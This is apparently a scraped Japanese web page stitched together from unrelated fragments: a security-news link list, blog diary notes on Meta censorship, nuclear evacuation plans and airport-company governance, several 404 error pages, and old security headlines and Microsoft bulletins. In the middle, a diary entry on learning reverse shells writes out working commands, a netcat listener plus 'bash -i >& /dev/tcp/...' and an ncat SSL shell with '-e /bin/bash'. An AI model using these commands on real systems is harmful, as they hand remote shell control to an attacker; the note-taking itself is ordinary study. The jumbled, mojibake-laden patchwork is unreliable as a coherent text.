すべて | WEB | セキュリティ | IT情報源 | その他 | 広告・マーケティング
パスワード もっと強く君を守りたい
原宿にて「パスワード」の大切さを啓発するマンガポスターを掲示しています。このポスターを学校や会社でも掲示したいとの声を受けて販売もしています。
セキュリティ対策自己宣言 SECURITY ACTION
「SECURITY ACTION」は中小企業自らが、情報セキュリティ対策に取組むことを自己宣言する制度です。安全・安心なIT社会を実現するために創設されました。
情報セキュリティ対策支援サイト
中小企業を中心に、企業・組織内の情報セキュリティ対策水準の向上を支援するポータルサイトです。情報セキュリティ対策を「知りたい」「学びたい」「始めたい」「続けたい」方々と、 それを後押しする方々の活動をサポートします。
》 それは不具合ではない:Metaによる組織的なパレスチナ言論の検閲 (p2ptk.org, 4/15)
》 全国の原発避難計画 調べてみえた地域差とは (NHK, 4/22)。複合災害時の復旧作業基準について明確化している県の少なさよ。
明記していた中では、▽民間の事業者の被ばく線量の上限を、一般の人の年間の限度とされる1ミリシーベルトとしているところが4道県(北海道、福島県、滋賀県、佐賀県)。
▽住民の避難や屋内退避が指示されるまでの段階で、民間の事業者による作業は中止するとしているところが2県だった(新潟県、愛媛県)。
残る13の府や県は明記していないと回答した。
(青森県、宮城県、茨城県、静岡県、石川県、富山県、福井県、京都府、島根県、鳥取県、長崎県、福岡県、鹿児島県)
あらかじめ決めておかないと、特攻隊になるぜ。
》 「JALとANAの天下りは問題」、空港施設に株主提案 国交省OBの人事介入、社長解任劇に続く第2幕 (東洋経済, 4/25)。「空港施設」という企業名です。
リム・アドバイザーズによる株主提案。
中でも注目のポイントは天下りの受け入れ禁止を求めている点だ。大株主であり、大口の取引先でもあるJALとANAの出身者が副社長に就任していることを問題視し、空港施設にさらなるガバナンス改革を迫っている。
0 新着情報
■ 2024.04.22: 曇
》 reverse shell のおべんきょう
How-To Create a Reverse Shell: Bash Script Cheat Sheet (I/O Flood, 2023.11.26)。nc -lvnp 5555 と書かれているが、これだと
FreeBSD では機動しない。
マニュアルを見ると -p source_port であり listen port を指定するオプションではない。
起動しないのが正常。
というか、
なぜ Linux では機動するのか。謎。
nc -lvn 5555 で待ち受け、bash -i >& /dev/tcp/hostipaddress/5555 0>&1 で接続。
うまくいった。
Encrypted reverse shell using ncat (O'Reilly)、 Encrypted Reverse Shell for Pentester (Raj Chandel’s Blog Hacking Articles, 2021.04.05)。
FreeBSD では、ncat は nmap パッケージ
についてくるコマンド。
ncat -l 443 --ssl -v で 待ち受け、ncat hostipaddress 443 --ssl -e /bin/bash -v
で接続。プロンプトが出ないが、まあそういうもの。
巧妙なトリック:署名付きの奇異なバックドア
04/10/2024
04/10/2024
ソフォス、SE Labs の最優秀 MSP ソリューションに選出される
・そのほかの不具合情
We窶决e sorry for the inconvenience.
Our website is temporarily unavailable.
Please try again soon.
お探しのページが
見つかりません
日経BP TOPページ
Copyright © Nikkei Business Publications, Inc.
All Rights Reserved.
Copyright© 2004-2018 Digital Advantage Corp.
標準
拡大
IPAホーム
産業サイバーセキュリティセンター
ソフトウェア高信頼化
未踏/セキュリティ・キャンプ
情報処理技術者試験・情報処理安全確保支援士
国際標準の推進
お探しのページ・ファイルが見つかりませんでした。
リニューアル等に伴い、ページ・ファイルのURLが変更された、または、削除された可能性があります。
大変お手数をおかけしますが、「トップページ」「サイトマップ」から再度お探しいただくか、「お問い合わせ」画面をご利用ください。
IPAウェブサイトトップページ
サイトマップ
お問い合わせ
情報公開
リンク
Copyright © IPA, Japan. All rights reserved.
インターネット治安情勢更新(平成28年3月期報を追加)(2016年04月28日)
Google「さあ世界のみんな、我々の『エンドツーエンド』の暗号化ツールを耐スパイ仕様にしてくれ〓ソー...
Google「さあ世界のみんな、我々の『エンドツーエンド』の暗号化ツールを耐スパイ仕様にしてくれ〓ソースコードは公開された。さっさと調べてしまおう(The Register)
Googleはソースコードを提供しているだけだ。それは Google のバグ報奨金プログラムを通して、このツールに存在するかもしれないセキュリティの欠陥を見つけ出すよう、研究者たちを奮励させるという考えである。
The Register 特集
[ 2014年6月18日(水) 08時30分 ]
chkrootkit の slapper() 関数の実装に起因する権限昇格の脆弱性(Scan Tech Report)
chkrootkit には、slapper() 関数の実装に起因して、権限昇格が可能な脆弱性が存在します。
ラック 特集
[ 2014年6月18日(水) 08時00分 ]
りそな銀行を騙るフィッシングメールを確認(フィッシング対策協議会)
Google「さあ世界のみんな、我々の『エンドツーエンド』の暗号化ツールを耐スパイ仕様にしてくれ〓ソースコードは公開された。さっさと調べてしまおう(The Register)
chkrootkit の slapper() 関数の実装に起因する権限昇格の脆弱性(Scan Tech Report)
研修医が無断でコピーした患者の情報が入った私物USBメモリを紛失(都立広尾病院)
Android 版アプリ「050 plus」に情報管理不備の脆弱性(JVN)
自動車や医療・ヘルスケア、AV家電へのサイバー攻撃や脅威に関する研究の事例集をまとめ公表(重要生活機器連携セキュリティ研究会)
次なるプライバシーの混乱を巻き起こすのは自動販売機だ〓あなたが笑顔で写るのはコカコーラのカメラか、コーヒーのカメラか、あるいは監視カメラか(The Register)
企業のマルチデバイス環境に対応するモバイル向けセキュリティ製品を発売(ウェブルート)
三菱東京UFJ銀行を騙るフィッシングメールを確認(フィッシング対策協議会)
車上荒しにより水道使用者情報が盗難(千葉県我孫子市)
Not Found
The requested URL was not found on this server.
404 Error
File Not Found
指定されたページ(URL)は見つかりません。
以下の状況が考えられます。
• URL に間違いがないか、再度確認してください。再読み込みしてください。
• ご利用中のユーザー様は 【 よくある質問 】 をご参照ください。
• 疑問点等ございましたら 【 お問い合せフォーム 】 よりお問合せください。
- We host your creativity
heteml Copyright © 2005 - paperboy&co. All Rights Reserved.
災害時もデータを守る 万が一のために今できること
慶応大・中村教授に聞く ビッグデータは社会に何をもたらすか?
ビッグデータ分析はRDBMSでできる!今すぐできる!
2011 年 10 月 15 日
CVSS指標が付されたセキュリティホール情報はありません。
直近3ヶ月 主要ソフトウェアの危険度 警告ボード -- 2011/07/15 〓 2011/10/15 の間に新規登録されたもの --
CVSS指標によるセキュリティホールのリスク評価 -- 2011/07/15 〓 2011/10/15 の間に新規登録されたもの --
MS05-001: HTML ヘルプの脆弱性により、コードが実行される (890175)
HTML ヘルプの ActiveX コントロールに存在するクロス ドメインの脆弱性を修正するセキュリティ更新プログラムを公開しました。
MS05-002: カーソルおよびアイコンのフォーマットの処理の脆弱性により、リモートでコードが実行される (891711)
カーソルおよびアイコンのフォーマット処理に存在する脆弱性を修正するセキュリティ更新プログラムを公開しました。
MS05-003: インデックス サービスの脆弱性により、リモートでコードが実行される (871250)
インデックス サービス クエリの検証を処理する方法に存在する脆弱性を修正するセキュリティ更新プログラムを公開しました。
2004 年 12 月の The Cable Guy コラムを公開しました。2004 年 2 月の The Cable Guy コラムを更新しました。
IIS Insider コラム
2004 年 9 月、10 月、11 月の IIS Insider コラムを公開しました。
セキュリティ更新プログラム情報やウイルス警報は、これまでにも「プロダクト セキュリティ警告サービス」として提供されていましたが、それとは別に日常のセキュリティ対策のための最新情報、予防策など実践的なセキュリティ技術情報をお届けする月刊ニュースレターを配信しています。最新のニュースレターを閲覧